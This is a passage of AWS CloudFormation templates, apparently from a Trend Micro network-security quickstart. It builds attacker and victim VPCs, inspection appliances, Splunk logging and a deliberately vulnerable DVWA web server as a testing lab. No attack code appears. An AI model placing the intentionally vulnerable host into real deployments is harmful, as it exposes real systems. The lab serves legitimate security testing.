AllowedValues: 202 | - c5.9xlarge 203 | - c5.4xlarge 204 | - c5.2xlarge 205 | - c5n.9xlarge 206 | - c5n.4xlarge 207 | - c5n.2xlarge 208 | Default: c5n.2xlarge 209 | SecurityVPCCIDR: 210 | Description: CIDR of the VPC where you want to deploy the NSVA. 211 | Type: String 212 | AllowedPattern: "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/(1[6-9]|2[0-6]))$" 213 | ConstraintDescription: "CIDR block parameter must be in the form x.x.x.x/16-26" 214 | Default: "10.10.10.0/16" 215 | NsvaCountPerAz: 216 | Description: Number of NSVA instances to be deployed in the AZ. 217 | Type: Number 218 | AllowedValues: 219 | - 1 220 | - 2 221 | - 3 222 | - 4 223 | Default: 1 224 | EnableInspectionLogs: 225 | Description: If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs". 226 | Type: String 227 | AllowedValues: [ true, false ] 228 | Default: false 229 | # ------------------------------------------------------------# 230 | # Conditions 231 | # ------------------------------------------------------------# 232 | Conditions: 233 | DeployC1NS: 234 | !Equals [true, !Ref DeployC1NS] 235 | 236 | Resources: 237 | # ------------------------------------------------------------# 238 | # Create Victim VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW) 239 | # ------------------------------------------------------------# 240 | VictimVpc: 241 | Type: AWS::CloudFormation::Stack 242 | Properties: 243 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml 244 | Parameters: 245 | VPCCIDR: 192.168.0.0/16 246 | PrivateSubnet1ACIDR: 192.168.1.0/24 247 | PrivateSubnet2ACIDR: 192.168.2.0/24 248 | PublicSubnet1CIDR: 192.168.11.0/24 249 | PublicSubnet2CIDR: 192.168.12.0/24 250 | NumberOfAZs: 2 251 | AvailabilityZones: 252 | Fn::Join: 253 | - "," 254 | - - Fn::Select: 255 | - 0 256 | - Fn::GetAZs: !Ref AWS::Region 257 | - Fn::Select: 258 | - 1 259 | - Fn::GetAZs: !Ref AWS::Region 260 | # ------------------------------------------------------------# 261 | # Create Victim Site (EC2, SecurityGroup) 262 | # ------------------------------------------------------------# 263 | Victim: 264 | Type: AWS::CloudFormation::Stack 265 | Properties: 266 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml 267 | Parameters: 268 | ImageId: !FindInMap 269 | - RegionMap 270 | - !Ref 'AWS::Region' 271 | - ImageId 272 | AllowIP: !Ref AllowIP 273 | NeedSSMAccess: !Ref SSMAccess 274 | VPCId: !GetAtt VictimVpc.Outputs.VPCID 275 | PrivateSubnet1ID: !GetAtt VictimVpc.Outputs.PrivateSubnet1AID 276 | WebServerIngressAllowCIDR: 172.16.0.0/16 277 | # ------------------------------------------------------------# 278 | # Create DVWA (DVWA Instance) 279 | # ------------------------------------------------------------# 280 | DVWA: 281 | Type: AWS::CloudFormation::Stack 282 | Properties: 283 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/dvwa.yaml 284 | Parameters: 285 | DVWAInstanceType: !Ref DVWAInstanceType 286 | KeyPairName: !Ref sshKeyPairName 287 | PublicSubnet1ID: !GetAtt VictimVpc.Outputs.PublicSubnet1ID 288 | QSS3BucketName: !Ref BucketName 289 | QSS3KeyPrefix: !Ref BucketPrefix 290 | DVWARemoteAccessCIDR: !Ref AllowIP 291 | QSS3BucketRegion: !Ref BucketRegion 292 | VPCID: !GetAtt VictimVpc.Outputs.VPCID 293 | # ------------------------------------------------------------# 294 | # Create Attacker VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW) 295 | # ------------------------------------------------------------# 296 | AttackerVpc: 297 | Type: AWS::CloudFormation::Stack 298 | Properties: 299 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml 300 | Parameters: 301 | VPCCIDR: 172.16.0.0/16 302 | PrivateSubnet1ACIDR: 172.16.1.0/24 303 | PrivateSubnet2ACIDR: 172.16.2.0/24 304 | PublicSubnet1CIDR: 172.16.11.0/24 305 | PublicSubnet2CIDR: 172.16.12.0/24 306 | NumberOfAZs: 2 307 | AvailabilityZones: 308 | Fn::Join: 309 | - "," 310 | - - Fn::Select: 311 | - 0 312 | - Fn::GetAZs: !Ref AWS::Region 313 | - Fn::Select: 314 | - 1 315 | - Fn::GetAZs: !Ref AWS::Region 316 | 317 | # ------------------------------------------------------------# 318 | # Create Attacker Site (EC2, SecurityGroup) 319 | # ------------------------------------------------------------# 320 | Attacker: 321 | Type: AWS::CloudFormation::Stack 322 | Properties: 323 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml 324 | Parameters: 325 | ImageId: !FindInMap 326 | - RegionMap 327 | - !Ref 'AWS::Region' 328 | - ImageId 329 | AllowIP: !Ref AllowIP 330 | NeedSSMAccess: !Ref SSMAccess 331 | VPCId: !GetAtt AttackerVpc.Outputs.VPCID 332 | PrivateSubnet1ID: !GetAtt AttackerVpc.Outputs.PrivateSubnet1AID 333 | WebServerIngressAllowCIDR: 192.168.0.0/16 334 | 335 | # ------------------------------------------------------------# 336 | # Create c1ns macro template 337 | # ------------------------------------------------------------# 338 | c1nsMacroTemplate: 339 | Condition: DeployC1NS 340 | Type: AWS::CloudFormation::Stack 341 | Properties: 342 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/macro.yml 343 | 344 | # ------------------------------------------------------------# 345 | # Create c1ns security vpc template 346 | # ------------------------------------------------------------# 347 | c1nsSecurityVPCTemplate: 348 | Condition: DeployC1NS 349 | Type: AWS::CloudFormation::Stack 350 | Properties: 351 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/security_vpc_legacy.yaml 352 | Parameters: 353 | sshKeyPairName: !Ref sshKeyPairName 354 | CloudOneAPIKEY: !Ref CloudOneAPIKEY 355 | NSVAAMI: !FindInMap 356 | - NSVAAMIRegionMap 357 | - !Ref 'AWS::Region' 358 | - ImageId 359 | InstanceType: !Ref InstanceType 360 | AvailabilityZones: 361 | Fn::Join: 362 | - "," 363 | - - Fn::Select: 364 | - 0 365 | - Fn::GetAZs: !Ref AWS::Region 366 | - Fn::Select: 367 | - 1 368 | - Fn::GetAZs: !Ref AWS::Region 369 | SecurityVPCCIDR: !Ref SecurityVPCCIDR 370 | NsvaCountPerAz: !Ref NsvaCountPerAz 371 | EnableInspectionLogs: !Ref EnableInspectionLogs 372 | DependsOn: c1nsMacroTemplate 373 | 374 | # ------------------------------------------------------------# 375 | # Create Last modify setting template (modify route table) 376 | # ------------------------------------------------------------# 377 | ModifyRTTemplate: 378 | Condition: DeployC1NS 379 | DependsOn: c1nsSecurityVPCTemplate 380 | Type: AWS::CloudFormation::Stack 381 | Properties: 382 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/last.yaml 383 | Parameters: 384 | AttackerVpcId: !GetAtt AttackerVpc.Outputs.VPCID 385 | VictimVpcId: !GetAtt VictimVpc.Outputs.VPCID 386 | AttackerPrivateSubnet1Id: !GetAtt AttackerVpc.Outputs.PrivateSubnet1AID 387 | AttackerPrivateSubnet2Id: !GetAtt AttackerVpc.Outputs.PrivateSubnet2AID 388 | VictimPrivateSubnet1Id: !GetAtt VictimVpc.Outputs.PrivateSubnet1AID 389 | VictimPrivateSubnet2Id: !GetAtt VictimVpc.Outputs.PrivateSubnet2AID 390 | AttackerPrivateSubnet1RouteTableId: !GetAtt AttackerVpc.Outputs.PrivateSubnet1ARouteTable 391 | AttackerPrivateSubnet2RouteTableId: !GetAtt AttackerVpc.Outputs.PrivateSubnet2ARouteTable 392 | VictimPrivateSubnet1RouteTableId: !GetAtt VictimVpc.Outputs.PrivateSubnet1ARouteTable 393 | VictimPrivateSubnet2RouteTableId: !GetAtt VictimVpc.Outputs.PrivateSubnet2ARouteTable 394 | VictimVpcCIDR: 192.168.0.0/16 395 | AttackerVpcCIDR: 172.16.0.0/16 396 | SecurityVpcStackName: 397 | Fn::Select: 398 | - 1 399 | - Fn::Split: 400 | - / 401 | - !Ref c1nsSecurityVPCTemplate 402 | SecurityVpcId: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCID 403 | VPCEndpointServiceName: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCEndpointServiceName 404 | AvailabilityZones: 405 | Fn::Join: 406 | - "," 407 | - - Fn::Select: 408 | - 0 409 | - Fn::GetAZs: !Ref AWS::Region 410 | - Fn::Select: 411 | - 1 412 | - Fn::GetAZs: !Ref AWS::Region 413 | 414 | # ------------------------------------------------------------# 415 | # Output Site URLs 416 | # ------------------------------------------------------------# 417 | Outputs: 418 | AttackerWebServerIP: 419 | Value: !GetAtt Attacker.Outputs.WebServerIP 420 | Description: Attacker Webserver IP 421 | VictimWebServerIP: 422 | Value: !GetAtt Victim.Outputs.WebServerIP 423 | Description: Victim Webserver IP 424 | DVWAIP: 425 | Value: !GetAtt DVWA.Outputs.DVWAPublicIP 426 | Description: DVWA instance Public IP 427 | DVWADeployment: 428 | Value: !GetAtt DVWA.Outputs.Postdeployment 429 | Description: See the deployment guide for post-deployment steps -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/Master.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Mappings: 4 | RegionMap: 5 | ap-northeast-1: 6 | ImageId: "ami-05f01a6a414be9808" 7 | HostedId: "Z1YSHQZHG15GKL" 8 | ap-northeast-2: 9 | ImageId: "ami-06835923fab139b98" 10 | HostedId: "Z20JF4UZKIW1U8" 11 | ap-northeast-3: 12 | ImageId: "ami-081eaee471c0e1518" 13 | HostedId: "Z5LXEXXYW11ES" 14 | us-east-2: 15 | ImageId: "ami-0233c2d874b811deb" 16 | HostedId: "ZOJJZC49E0EPZ" 17 | us-east-1: 18 | ImageId: "ami-0dc2d3e4c0f9ebd18" 19 | HostedId: "Z1UJRXOUMOOFQ8" 20 | us-west-1: 21 | ImageId: "ami-0ed05376b59b90e46" 22 | HostedId: "Z2MUQ32089INYE" 23 | us-west-2: 24 | ImageId: "ami-0dc8f589abe99f538" 25 | HostedId: "Z2OJLYMUO9EFXC" 26 | ap-south-1: 27 | ImageId: "ami-00bf4ae5a7909786c" 28 | HostedId: "Z3VO1THU9YC4UR" 29 | ap-southeast-1: 30 | ImageId: "ami-0e5182fad1edfaa68" 31 | HostedId: "ZL327KTPIQFUL" 32 | ap-southeast-2: 33 | ImageId: "ami-0c9fe0dec6325a30c" 34 | HostedId: "Z2RPCDW04V8134" 35 | ca-central-1: 36 | ImageId: "ami-0db72f413fc1ddb2a" 37 | HostedId: "Z19DQILCV0OWEC" 38 | eu-central-1: 39 | ImageId: "ami-00f22f6155d6d92c5" 40 | HostedId: "Z1U9ULNL0V5AJ3" 41 | eu-west-1: 42 | ImageId: "ami-058b1b7fe545997ae" 43 | HostedId: "ZLY8HYME6SFDD" 44 | eu-west-2: 45 | ImageId: "ami-03ac5a9b225e99b02" 46 | HostedId: "ZJ5UAJN8Y3Z2Q" 47 | eu-west-3: 48 | ImageId: "ami-062fdd189639d3e93" 49 | HostedId: "Z3KY65QIEKYHQQ" 50 | eu-north-1: 51 | ImageId: "ami-00517306b63c4628c" 52 | HostedId: "Z3UWIKFBOOGXPP" 53 | sa-east-1: 54 | ImageId: "ami-0f8243a5175208e08" 55 | HostedId: "ZCMLWB8V5SYIT" 56 | # ap-east-1: 57 | # HostedId: "Z3FD1VL90ND7K5" 58 | # me-south-1: 59 | # HostedId: "Z20ZBPC0SS8806" 60 | 61 | NSVAAMIRegionMap: 62 | # IPS_AMI--2021.7.0.11129 63 | us-east-1: 64 | ImageId: ami-0c55b11b8c1850074 65 | us-east-2: 66 | ImageId: ami-049ac6c43ccc0eb59 67 | us-west-1: 68 | ImageId: ami-0c61fb7ad31615bc9 69 | us-west-2: 70 | ImageId: ami-0abee844f98a90719 71 | af-south1: 72 | ImageId: ami-07beb2f931b25bac4 73 | ap-east-1: 74 | ImageId: ami-0eef4c54b43719b15 75 | ap-south-1: 76 | ImageId: ami-0bb4faee68f7cbd25 77 | ap-northeast-2: 78 | ImageId: ami-06835923fab139b98 79 | ap-northeast-1: 80 | ImageId: ami-05f01a6a414be9808 81 | ap-southeast-1: 82 | ImageId: ami-08c9d7bc95ea77e79 83 | ap-southeast-2: 84 | ImageId: ami-095df8b8ec0e0aac5 85 | ca-central-1: 86 | ImageId: ami-0c1c1a2c0b54eea1e 87 | eu-north-1: 88 | ImageId: ami-0c3ba132507949f56 89 | eu-west-3: 90 | ImageId: ami-02c47030c3e886b4f 91 | eu-west-2: 92 | ImageId: ami-062e147780edfffc4 93 | eu-west-1: 94 | ImageId: ami-0c0a077459b3222d9 95 | eu-central-1: 96 | ImageId: ami-039d4a40e711415db 97 | eu-south-1: 98 | ImageId: ami-001fe5ed24c292c15 99 | me-south-1: 100 | ImageId: ami-036c40a2988da6da7 101 | sa-east-1: 102 | ImageId: ami-0edc19454ec876784 103 | 104 | Metadata: 105 | AWS::CloudFormation::Interface: 106 | ParameterGroups: 107 | - 108 | Label: 109 | default: Required parameters 110 | Parameters: 111 | - AllowIP 112 | - BucketName 113 | - BucketPrefix 114 | - BucketRegion 115 | - DVWAInstanceType 116 | - sshKeyPairName 117 | - SSMAccess 118 | - DeployHTTPS 119 | - DeployC1NS 120 | - DeployC1NSHA 121 | - DeploySplunk 122 | - 123 | Label: 124 | default: If you set the DeployHTTPS parameter to true, the following parameters are required 125 | Parameters: 126 | - DomainName 127 | - SubDomain 128 | - HostZoneID 129 | - 130 | Label: 131 | default: If you set the DeployC1NS parameter to true, the following parameters are required 132 | Parameters: 133 | - CloudOneAPIKEY 134 | - InstanceType 135 | - SecurityVPCCIDR 136 | - NsvaCountPerAz 137 | - EnableInspectionLogs 138 | - 139 | Label: 140 | default: If you set the DeploySplunk parameter to true, the following parameters are required 141 | Parameters: 142 | - SyslogPort 143 | - SplunkPassword 144 | - SplunkVersion 145 | 146 | Parameters: 147 | # ------------------------------------------------------------# 148 | # Required parameters 149 | # ------------------------------------------------------------# 150 | AllowIP: 151 | Description: Enter the global IP of the terminal to be tested 152 | Type: String 153 | AllowedPattern: "(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})/(\\d{1,2})" 154 | ConstraintDescription: "Must be a valid IP range of the form x.x.x.x/x" 155 | Default: '127.0.0.1/32' 156 | BucketName: 157 | Description: Name of the bucket where the template is placed 158 | Type: String 159 | Default: 'quickstart-network-security' 160 | BucketPrefix: 161 | Description: Bucket prefix 162 | Type: String 163 | Default: 'centralized-with-gwlb/' 164 | BucketRegion: 165 | Description: Bucket region 166 | Type: String 167 | Default: 'us-west-1' 168 | DVWAInstanceType: 169 | AllowedValues: 170 | - t2.nano 171 | - t2.micro 172 | - t2.small 173 | - t2.medium 174 | - t2.large 175 | - t3.micro 176 | - t3.small 177 | - t3.medium 178 | - t3.large 179 | - t3.xlarge 180 | - t3.2xlarge 181 | - m3.large 182 | - m3.xlarge 183 | - m3.2xlarge 184 | - m4.large 185 | - m4.xlarge 186 | - m4.2xlarge 187 | - m4.4xlarge 188 | Default: t3.micro 189 | Description: "Amazon EC2 instance type for the DVWA instances. Damn Vulnerable Web 190 | Application (DVWA) hosts are machines placed in the public subnet which are PHP/MySQL Web App and are vulnerable. 191 | This allows security professionals to test Network Security in a legal 192 | environment. For more information visit: https://dvwa.co.uk/" 193 | Type: String 194 | sshKeyPairName: 195 | Description: SSH Key of the EC2 you are using 196 | Type: AWS::EC2::KeyPair::KeyName 197 | ConstraintDescription: Must be the name of an existing EC2 KeyPair 198 | SSMAccess: 199 | Description: If enabled, SSM access to the instance will be available. 200 | Type: String 201 | AllowedValues: [true, false] 202 | Default: true 203 | DeployHTTPS: 204 | Description: If enabled, The HTTPS site will be deployed. 205 | Type: String 206 | AllowedValues: [true, false] 207 | Default: false 208 | DeployC1NS: 209 | Description: If enabled, C1NS with be deployed in centralized Security VPC 210 | Type: String 211 | AllowedValues: [true, false] 212 | Default: true 213 | DeployC1NSHA: 214 | Description: "[Required: 'DeployC1NS' must be set to true] If enabled, C1NS HA deployed." 215 | Type: String 216 | AllowedValues: [true, false] 217 | Default: false 218 | DeploySplunk: 219 | Description: "[Required: 'DeployC1NS' must be set to true] If enabled, Splunk Server will be deployed." 220 | Type: String 221 | AllowedValues: [true, false] 222 | Default: false 223 | # ------------------------------------------------------------# 224 | # If you set the DeployHTTPS parameter to true, the following parameters are required 225 | # ------------------------------------------------------------# 226 | DomainName: 227 | Description: Domain name to be used for the website. 228 | Type: String 229 | Default: '' 230 | SubDomain: 231 | Description: Subdomain to be used for the ALB. 232 | Type: String 233 | Default: '' 234 | HostZoneID: 235 | Description: ID of the HostZone where the domain you want to use is registered. 236 | Type: String 237 | Default: '' 238 | # ------------------------------------------------------------# 239 | # If you set the DeployC1NS parameter to true, the following parameters are required 240 | # ------------------------------------------------------------# 241 | CloudOneAPIKEY: 242 | Description: Trend Micro Cloud One API key you want to use. 243 | Type: String 244 | NoEcho: true 245 | InstanceType: 246 | Description: Instance type of NSVA 247 | Type: String 248 | AllowedValues: 249 | - c5.9xlarge 250 | - c5.4xlarge 251 | - c5.2xlarge 252 | - c5n.9xlarge 253 | - c5n.4xlarge 254 | - c5n.2xlarge 255 | Default: c5n.2xlarge 256 | SecurityVPCCIDR: 257 | Description: CIDR of the VPC where you want to deploy the NSVA. 258 | Type: String 259 | AllowedPattern: "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\\/(1[6-9]|2[0-6]))$" 260 | ConstraintDescription: "CIDR block parameter must be in the form x.x.x.x/16-26" 261 | Default: "10.10.10.0/16" 262 | NsvaCountPerAz: 263 | Description: Number of NSVA instances to be deployed in the AZ. 264 | Type: Number 265 | AllowedValues: 266 | - 1 267 | - 2 268 | - 3 269 | - 4 270 | Default: 1 271 | EnableInspectionLogs: 272 | Description: If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs". 273 | Type: String 274 | AllowedValues: [ true, false ] 275 | Default: false 276 | # ------------------------------------------------------------# 277 | # If you set the DeploySplunk parameter to true, the following parameters are required 278 | # ------------------------------------------------------------# 279 | SyslogPort: 280 | Description: Port number used by Splunk Server 281 | Type: String 282 | Default: '5140' 283 | SplunkPassword: 284 | Description: Password used by Splunk Server 285 | Type: String 286 | NoEcho: true 287 | Default: '' 288 | SplunkVersion: 289 | Description: Splunk Version 290 | Type: String 291 | Default: '8.2' 292 | 293 | # ------------------------------------------------------------# 294 | # Conditions 295 | # ------------------------------------------------------------# 296 | Conditions: 297 | DeployHTTPS: 298 | !Equals [true, !Ref DeployHTTPS] 299 | DeployC1NS: 300 | !Equals [true, !Ref DeployC1NS] 301 | DeployC1NSHAmodel: 302 | !Equals [true, !Ref DeployC1NSHA] 303 | DeployC1NSHA: !And 304 | - !Condition DeployC1NS 305 | - !Condition DeployC1NSHAmodel 306 | DeploySplunksrv: 307 | !Equals [true, !Ref DeploySplunk] 308 | DeploySplunk: !And 309 | - !Condition DeployC1NS 310 | - !Condition DeploySplunksrv 311 | 312 | Resources: 313 | # ------------------------------------------------------------# 314 | # Create Base VPC (VPC, IGW, Subnet, RouteTable, EIP, NatGW) 315 | # ------------------------------------------------------------# 316 | BaseVPC: 317 | Type: AWS::CloudFormation::Stack 318 | Properties: 319 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/aws-vpc.template.yaml 320 | Parameters: 321 | NumberOfAZs: 2 322 | AvailabilityZones: 323 | Fn::Join: 324 | - "," 325 | - - Fn::Select: 326 | - 0 327 | - Fn::GetAZs: !Ref AWS::Region 328 | - Fn::Select: 329 | - 1 330 | - Fn::GetAZs: !Ref AWS::Region 331 | 332 | # ------------------------------------------------------------# 333 | # Create DVWA (DVWA Instance) 334 | # ------------------------------------------------------------# 335 | DVWA: 336 | Type: AWS::CloudFormation::Stack 337 | Properties: 338 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/dvwa.yaml 339 | Parameters: 340 | DVWAInstanceType: !Ref DVWAInstanceType 341 | KeyPairName: !Ref sshKeyPairName 342 | PublicSubnet1ID: !GetAtt BaseVPC.Outputs.PublicSubnet1ID 343 | QSS3BucketName: !Ref BucketName 344 | QSS3KeyPrefix: !Ref BucketPrefix 345 | DVWARemoteAccessCIDR: !Ref AllowIP 346 | QSS3BucketRegion: !Ref BucketRegion 347 | VPCID: !GetAtt BaseVPC.Outputs.VPCID 348 | 349 | # ------------------------------------------------------------# 350 | # Create Base Site (EC2, SecurityGroup) 351 | # ------------------------------------------------------------# 352 | BaseSite: 353 | Type: AWS::CloudFormation::Stack 354 | Properties: 355 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/BaseSite.yaml 356 | Parameters: 357 | ImageId: !FindInMap 358 | - RegionMap 359 | - !Ref 'AWS::Region' 360 | - ImageId 361 | AllowIP: !Ref AllowIP 362 | NeedSSMAccess: !Ref SSMAccess 363 | VPCId: !GetAtt BaseVPC.Outputs.VPCID 364 | PrivateSubnet1ID: !GetAtt BaseVPC.Outputs.PrivateSubnet1AID 365 | PublicSubnet1ID: !GetAtt BaseVPC.Outputs.PublicSubnet1ID 366 | PublicSubnet2ID: !GetAtt BaseVPC.Outputs.PublicSubnet2ID 367 | 368 | # ------------------------------------------------------------# 369 | # Create LoadBalancer and https site (ALB, TargetGroup, Listener, ACM) 370 | # ------------------------------------------------------------# 371 | AddALB: 372 | Condition: DeployHTTPS 373 | Type: AWS::CloudFormation::Stack 374 | Properties: 375 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/AddALB.yaml 376 | Parameters: 377 | DomainName: !Ref DomainName 378 | SubDomain: !Ref SubDomain 379 | HostZoneID: !Ref HostZoneID 380 | TargetGroupID: !GetAtt BaseSite.Outputs.TargetGroupID 381 | ALBID: !GetAtt BaseSite.Outputs.ALBID 382 | HostedZoneId: !GetAtt BaseSite.Outputs.HostedZoneId 383 | DNSName: !GetAtt BaseSite.Outputs.HTTPWebSiteURL 384 | 385 | # ------------------------------------------------------------# 386 | # Create RemoveRecord Function 387 | # ------------------------------------------------------------# 388 | RemoveRecord: 389 | Condition: DeployHTTPS 390 | Type: AWS::CloudFormation::Stack 391 | Properties: 392 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/RemoveRecord.yaml 393 | Parameters: 394 | HostZoneID: !Ref HostZoneID 395 | 396 | # ------------------------------------------------------------# 397 | # Create c1ns macro template 398 | # ------------------------------------------------------------# 399 | c1nsMacroTemplate: 400 | Condition: DeployC1NS 401 | Type: AWS::CloudFormation::Stack 402 | Properties: 403 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/macro.yml 404 | 405 | # ------------------------------------------------------------# 406 | # Create c1ns security vpc template 407 | # ------------------------------------------------------------# 408 | c1nsSecurityVPCTemplate: 409 | Condition: DeployC1NS 410 | Type: AWS::CloudFormation::Stack 411 | Properties: 412 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/security_vpc_legacy.yaml 413 | Parameters: 414 | sshKeyPairName: !Ref sshKeyPairName 415 | CloudOneAPIKEY: !Ref CloudOneAPIKEY 416 | NSVAAMI: !FindInMap 417 | - NSVAAMIRegionMap 418 | - !Ref 'AWS::Region' 419 | - ImageId 420 | InstanceType: !Ref InstanceType 421 | AvailabilityZones: 422 | Fn::Join: 423 | - "," 424 | - - Fn::Select: 425 | - 0 426 | - Fn::GetAZs: !Ref AWS::Region 427 | - Fn::Select: 428 | - 1 429 | - Fn::GetAZs: !Ref AWS::Region 430 | SecurityVPCCIDR: !Ref SecurityVPCCIDR 431 | NsvaCountPerAz: !Ref NsvaCountPerAz 432 | EnableInspectionLogs: !Ref EnableInspectionLogs 433 | DependsOn: c1nsMacroTemplate 434 | 435 | # ------------------------------------------------------------# 436 | # Create the IAM role stack for cross-account deployments 437 | # ------------------------------------------------------------# 438 | CrossAccountIAMTemplate: 439 | Condition: DeployC1NSHA 440 | Type: AWS::CloudFormation::Stack 441 | Properties: 442 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/ha_lambda_cross_account_iam.yaml 443 | Parameters: 444 | SecurityVpcAccountId: !Ref "AWS::AccountId" 445 | ExternalId: !GetAtt c1nsSecurityVPCTemplate.Outputs.ExternalId 446 | DependsOn: ModifyRTTemplate 447 | 448 | # ------------------------------------------------------------# 449 | # Create HA stack deployments 450 | # ------------------------------------------------------------# 451 | HaLambdaTemplate: 452 | Condition: DeployC1NSHA 453 | Type: AWS::CloudFormation::Stack 454 | Properties: 455 | TemplateURL: https://trendmicro-tippingpoint.s3.amazonaws.com/documentation/templates/ha_resources_vpc_ingress.yaml 456 | Parameters: 457 | securityVpcStackName: 458 | Fn::Select: 459 | - 1 460 | - Fn::Split: 461 | - / 462 | - !Ref c1nsSecurityVPCTemplate 463 | DependsOn: CrossAccountIAMTemplate 464 | 465 | # ------------------------------------------------------------# 466 | # Create Last modify setting template (modify route table) 467 | # ------------------------------------------------------------# 468 | ModifyRTTemplate: 469 | Condition: DeployC1NS 470 | Type: AWS::CloudFormation::Stack 471 | Properties: 472 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/last.yaml 473 | Parameters: 474 | VPC: !GetAtt BaseVPC.Outputs.VPCID 475 | InternetGateway: !GetAtt BaseVPC.Outputs.IGWID 476 | BasePublicSubnet1CIDR: !GetAtt BaseVPC.Outputs.PublicSubnet1CIDR 477 | BasePublicSubnet2CIDR: !GetAtt BaseVPC.Outputs.PublicSubnet2CIDR 478 | BasePublicSubnet1RouteTable: !GetAtt BaseVPC.Outputs.PublicSubnet1RouteTable 479 | BasePublicSubnet2RouteTable: !GetAtt BaseVPC.Outputs.PublicSubnet2RouteTable 480 | VPCEndpointServiceName: !GetAtt c1nsSecurityVPCTemplate.Outputs.VPCEndpointServiceName 481 | AvailabilityZones: 482 | Fn::Join: 483 | - "," 484 | - - Fn::Select: 485 | - 0 486 | - Fn::GetAZs: !Ref AWS::Region 487 | - Fn::Select: 488 | - 1 489 | - Fn::GetAZs: !Ref AWS::Region 490 | 491 | # ------------------------------------------------------------# 492 | # Create Splunk Server 493 | # ------------------------------------------------------------# 494 | SplunkTemplate: 495 | Condition: DeploySplunk 496 | Type: AWS::CloudFormation::Stack 497 | Properties: 498 | TemplateURL: !Sub https://${BucketName}.s3.${BucketRegion}.amazonaws.com/${BucketPrefix}templates/splunk.yaml 499 | Parameters: 500 | VPCID: !GetAtt BaseVPC.Outputs.VPCID 501 | VPCCIDR: !GetAtt BaseVPC.Outputs.VPCCIDR 502 | RTID: !GetAtt ModifyRTTemplate.Outputs.PublicSubnet1Route 503 | AllowIP: !Ref AllowIP 504 | SyslogPort: !Ref SyslogPort 505 | SecurityVPCCIDR: !Ref SecurityVPCCIDR 506 | ImageId: !FindInMap 507 | - RegionMap 508 | - !Ref 'AWS::Region' 509 | - ImageId 510 | PublicSubnet1ID: !GetAtt ModifyRTTemplate.Outputs.PublicSubnet1ID 511 | SplunkPassword: !Ref SplunkPassword 512 | SplunkVersion: !Ref SplunkVersion 513 | c1nsStackName: 514 | Fn::Select: 515 | - 1 516 | - Fn::Split: 517 | - / 518 | - !Ref c1nsSecurityVPCTemplate 519 | InstanceProfile: !GetAtt BaseSite.Outputs.InstanceProfile 520 | NeedSSMAccess: !Ref SSMAccess 521 | 522 | # ------------------------------------------------------------# 523 | # Output Site URLs 524 | # ------------------------------------------------------------# 525 | Outputs: 526 | HTTPWebSiteURL: 527 | Value: !GetAtt BaseSite.Outputs.HTTPWebSiteURL 528 | Description: HTTP site URL 529 | HTTPSWebSiteURL: 530 | Condition: DeployHTTPS 531 | Value: !GetAtt AddALB.Outputs.HTTPSWebSiteURL 532 | Description: HTTPS site URL 533 | SplunkURL: 534 | Condition: DeploySplunk 535 | Value: !GetAtt SplunkTemplate.Outputs.SplunkURL 536 | Description: Splunk URL 537 | SplunkInternalIP: 538 | Condition: DeploySplunk 539 | Value: !GetAtt SplunkTemplate.Outputs.SplunkInternalIP 540 | Description: Splunk private IP address 541 | DVWAIP: 542 | Value: !GetAtt DVWA.Outputs.DVWAPublicIP 543 | Description: DVWA instance Public IP 544 | DVWADeployment: 545 | Value: !GetAtt DVWA.Outputs.Postdeployment 546 | Description: See the deployment guide for post-deployment steps --------------------------------------------------------------------------------